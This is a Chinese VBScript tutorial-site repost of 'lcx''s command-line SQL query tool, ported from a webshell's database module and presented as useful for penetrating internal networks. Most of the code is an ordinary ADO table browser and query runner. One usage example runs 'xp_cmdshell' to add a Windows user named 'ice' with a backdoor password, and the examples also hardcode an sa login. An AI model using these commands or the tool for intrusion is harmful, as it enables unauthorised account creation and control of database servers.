当前位置: 首页 > 图文教程 > 脚本技术 > VBScript > vbs版sql查询分析器lcx作品

VBScript
VBS中SendKeys的基本应用
VBScript教程 第十四课在VBScript中使用对象
VBScript教程 第十三课 VBScript与窗体
VBScript教程 第十二课VBScript页面的简单样例
VBScript教程 第十一课深入VBScript
VBScript教程 第十课 VBScript编码约定
VBScript教程 第九课VBScript过程
VBScript教程 第八课 使用循环语句
VBScript教程 第七课使用条件语句
VBScript教程 第六课VBScript运算符
VBscript教程 第五课 VBScript常数
VBScript教程 第四课VBScript变量
VBScript教程 第三课VBScript数据类型
VBScript教程 第二课在HTML页面中添加VBscript代码
VBScript教程 第一课什么是VBScript
VBScript的入门学习资料
VBScript语法速查及实例说明
MsgBox函数语言参考
VBS教程:正则表达式简介 -后向引用
VBS教程:正则表达式简介 -选择与编组

VBScript 中的 vbs版sql查询分析器lcx作品


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-11   浏览: 73 ::
收藏到网摘: n/a

花了一点时间把以前的海阳顶端2006的sql模块改成vbs版了,和它的功能是一模一样的,不过用起来可能没有asp版的舒服,不过能用,可以用在dos下了,渗透内网时估计你用得着。
if (lcase(right(wscript.fullname,11))="wscript.exe") then
echo "Execute it under the cmd.exe Plz! Thx."
echo "code by lcx"
wscript.quit
end If
if wscript.arguments.count<1 then
echo "Usage: cscript sql.vbs showTables e:\hytop.mdb或sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs;"
echo "usage: cscript sql.vbs query 连接字符串 <表名=default:""""> sql语句 <页数=default:1>"
echo "exp:cscript sql.vbs showTables "&Chr(34)&"sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs"&Chr(34)
echo "exp:cscript sql.vbs query "&Chr(34)&"sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs"&Chr(34)&Space(1) &Chr(34)&Chr(34)&Space(1)&Chr(34)&"select * from name"&chr(34)&Space(1) & 1
echo "exp:cscript sql.vbs query "&Chr(34)&"sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs"&Chr(34)&Space(1) &Chr(34)&Chr(34)&Space(1)&Chr(34)&"update....."&chr(34)&Space(1) & 1
echo "exp:cscript sql.vbs query "&Chr(34)&"sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs"&Chr(34)&Space(1) &Chr(34)&Chr(34)&Space(1)&Chr(34)&"exec master.dbo.xp_cmdshell 'net user ice hacker /add'--"&chr(34)&Space(1) & 1
end If
Sub chkErr(Err)
If Err Then
echo "错误: " & Err.Description & "错误源: " & Err.Source & vbcrlf
Err.Clear
wscript.quit
End If
End Sub

Sub echo(str)
wscript.echo str
End Sub
Function fixNull(str)
If IsNull(str) Then
str = " "
End If
fixNull = str
End Function
Sub showErr(str)
Dim i, arrayStr
arrayStr = Split(str, "$$")
echo "出错信息:"&vbcrlf
For i = 0 To UBound(arrayStr)
echo (i + 1) & ". " & arrayStr(i) & "<br/>"
Next
echo vbcrlf
wscript.quit
End Sub
Rem =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Rem 下面是程序模块选择部分
Rem =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

PageMsDataBase()

Sub pageMsDataBase()
Dim theAct, sqlStr
theAct = Wscript.Arguments(0)
sqlStr = Wscript.Arguments(1)
Select Case theAct
Case "showTables"
showTables()
Case "query"
showQuery()
End Select
End Sub
Sub showTables()
Dim conn, sqlStr, rsTable, rsColumn, connStr, tablesStr
sqlStr = Wscript.Arguments(1)
If LCase(Left(sqlStr, 4)) = "sql:" Then
connStr = Mid(sqlStr, 5)
Else
connStr = "Provider=Microsoft.Jet.Oledb.4.0;Data Source=" & sqlStr
End If
Set conn = CreateObject("Adodb.Connection")
conn.Open connStr
chkErr(Err)
tablesStr = getTableList(conn, sqlStr, rsTable)

echo tablesStr & "================================================="

Do Until rsTable.Eof
Set rsColumn = conn.OpenSchema(4, Array(Empty, Empty, rsTable("Table_Name").value))
echo rsTable("Table_Name") &vbcrlf
Do Until rsColumn.Eof
echo "字段名:" & rsColumn("Column_Name")&vbclrf
echo "类型:" & getDataType(rsColumn("Data_Type")) & vbclrf
echo "大小:" & rsColumn("Character_Maximum_Length") & vbclrf
echo "精度:" & rsColumn("Numeric_Precision") & vbclrf
echo "允许为空:" & rsColumn("Is_Nullable") & vbclrf
echo "默认值:" & rsColumn("Column_Default") & vbclrf&vbclrf
rsColumn.MoveNext
Loop
rsTable.MoveNext
echo vbcrlf
Loop
echo "==============================================================="
conn.Close
Set conn = Nothing
Set rsTable = Nothing
Set rsColumn = Nothing
End Sub
Sub showQuery()
Dim i, j, rs, sql, page, conn, sqlStr, connStr, rsTable, tablesStr, theTable
sqlStr = Wscript.Arguments(1)
theTable = Wscript.Arguments(2)
sql=Wscript.Arguments(3)
page=Wscript.Arguments(4)
If Not IsNumeric(page) or page = "" Then
page = 1
End If

If LCase(Left(sqlStr, 4)) = "sql:" Then
connStr = Mid(sqlStr, 5)
Else
connStr = "Provider=Microsoft.Jet.Oledb.4.0;Data Source=" & sqlStr
End If
Set rs = CreateObject("Adodb.RecordSet")
Set conn = CreateObject("Adodb.Connection")
conn.Open connStr
chkErr(Err)
tablesStr = getTableList(conn, sqlStr, rsTable)
echo "数据库表结构查看:"
echo tablesStr & "========================================================"
echo ">SQL命令执行及查看<:"&vbcrlf
If sql <> "" And Left(LCase(sql), 7) = "select " Then
rs.Open sql, conn, 1, 1
chkErr(Err)
rs.PageSize = 20
If Not rs.Eof Then
rs.AbsolutePage = page
End If
If rs.Fields.Count>0 Then
echo "SQL操作 - 执行结果"&vbcrlf
echo "===================="&theTable&"列名如下========================================"
For j = 0 To rs.Fields.Count-1
echo rs.Fields(j).Name & vbcrlf
Next
For i = 1 To 20
If rs.Eof Then
Exit For
End If

For j = 0 To rs.Fields.Count-1
echo fixNull(rs(j))& vbcrlf
Next
rs.MoveNext
Next
End If
echo "================================================================="
echo " 共有"&rs.Fields.Count&"列" & vbcrlf
For i = 1 To rs.PageCount
page=i
Next
echo " 共有" & page & "页"
rs.Close
Else
If sql <> "" Then
conn.Execute(sql)
chkErr(Err)
echo "执行完毕!"&vbcrlf
End If
End If

conn.Close
Set rs = Nothing
Set conn = Nothing
Set rsTable = Nothing
End Sub
Function getDataType(typeId)
Select Case typeId
Case 130
getDataType = "文本"
Case 2
getDataType = "整型"
Case 3
getDataType = "长整型"
Case 7
getDataType = "日期/时间"
Case 5
getDataType = "双精度型"
Case 11
getDataType = "是/否"
Case 128
getDataType = "OLE 对象"
Case Else
getDataType = typeId
End Select
End Function

Function getTableList(conn, sqlStr, rsTable)
Set rsTable = conn.OpenSchema(20, Array(Empty, Empty, Empty, "table"))
echo "存在以下表名:"
Do Until rsTable.Eof
getTableList = getTableList & "["& rsTable("Table_Name") & "]"&vbcrlf
rsTable.MoveNext
Loop
rsTable.MoveFirst
End Function